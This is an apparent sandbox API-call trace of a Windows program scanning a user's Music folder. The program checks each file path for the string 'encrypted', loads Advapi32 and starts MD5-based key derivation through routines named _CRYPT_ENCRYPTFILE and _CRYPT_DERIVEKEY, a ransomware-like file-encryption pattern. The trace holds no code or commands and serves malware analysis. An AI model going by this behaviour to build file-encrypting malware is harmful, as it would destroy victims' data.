PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.061] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.061] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0xddf610, ftLastWriteTime.dwHighDateTime=0x1d5b5a7, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 0x7c20c0 [0038.061] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.061] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0xddf610, ftLastWriteTime.dwHighDateTime=0x1d5b5a7, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 0x7c20c0 [0038.061] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.061] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oSCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SCes8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ces8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SvUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vUMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UMdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MdBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dBH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BH5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SwJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wJrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JrEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rEWp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.063] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.063] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.063] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.063] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.063] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.063] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.064] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.064] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0xddf610, ftLastWriteTime.dwHighDateTime=0x1d5b5a7, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 0x7c2100 [0038.064] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.064] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.064] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.064] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.064] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.064] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.065] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.065] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.065] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.065] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0038.065] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.066] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.066] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.066] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.066] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.066] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.066] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.067] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.067] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.067] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.067] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.067] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.067] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 